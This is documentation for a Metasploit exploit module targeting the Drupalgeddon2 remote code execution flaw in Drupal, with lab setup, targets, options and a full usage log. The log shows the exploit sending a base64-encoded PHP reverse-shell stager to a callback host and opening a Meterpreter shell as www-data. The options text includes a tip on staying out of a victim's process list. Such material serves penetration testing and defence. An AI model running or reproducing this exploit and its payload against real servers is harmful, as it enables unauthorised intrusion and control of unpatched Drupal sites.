## Introduction

This module exploits a Drupal property injection in the Forms API.
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

## Setup

Use the provided Docker images here: <https://hub.docker.com/_/drupal/>.

Alternatively, you may use TurnKey Linux's distributions:

Drupal 7.54: <http://mirror.turnkeylinux.org/turnkeylinux/images/iso/turnkey-drupal7-14.2-jessie-amd64.iso>
Drupal 8.3.1: <http://mirror.turnkeylinux.org/turnkeylinux/images/iso/turnkey-drupal8-14.2-jessie-amd64.iso>

Tested on 7.57 and 8.4.5 in Docker and 7.54 and 8.3.1 in TurnKey.

## Targets

```
Id  Name
--  ----
0   Automatic (PHP In-Memory)
1   Automatic (PHP Dropper)
2   Automatic (Unix In-Memory)
3   Automatic (Linux Dropper)
4   Drupal 7.x (PHP In-Memory)
5   Drupal 7.x (PHP Dropper)
6   Drupal 7.x (Unix In-Memory)
7   Drupal 7.x (Linux Dropper)
8   Drupal 8.x (PHP In-Memory)
9   Drupal 8.x (PHP Dropper)
10  Drupal 8.x (Unix In-Memory)
11  Drupal 8.x (Linux Dropper)
```

Automatic targeting means the Drupal version will be detected first.
Targets with a specific version will do as they're told (regardless of
what the server is running).

Dropper targets write to disk. In-memory targets don't. Be mindful of
showing up in someone's process list, though. A dropper might be more
viable in that regard.

## Options

### TARGETURI

Set this to the remote path of the vulnerable Drupal install. Defaults
to `/` for the web root.

### PHP_FUNC

Set this to the PHP function you'd like to execute. Defaults to
`passthru`.

### DUMP_OUTPUT

Enable this if you'd like to see HTTP responses, including command
output. Defaults to `false` unless `cmd/unix/generic` is your payload.

### VERBOSE

Enable this to show what function and command were executed. Defaults to
`false` due to the sometimes excessive output.

### ForceExploit

Enable this to force exploitation regardless of the check result.
Defaults to `false`, meaning the check result is respected.

### WritableDir

Set this to a writable directory without `noexec` for binary payloads.
Defaults to `/tmp`, but other options may include `/var/tmp` and
`/dev/shm`.

## Usage

Drupal 7.57 from the Docker image is tested below.

```
msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3
rhost => 172.17.0.3
msf exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true
verbose => true
msf exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7 targeted at http://172.17.0.3/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue
[+] Drupal is vulnerable to code execution
[+] 172.17.0.3:80 The target is vulnerable.
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Drupal 7 targeted at http://172.17.0.3/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): paAHBb9jyovEnLrrT5lMIB
[+] Drupal is vulnerable to code execution
[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
[*] Sending stage (37775 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46654) at 2018-04-24 23:25:17 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : b3a405d5568a
OS          : [redacted]
Meterpreter : php/linux
meterpreter >
```
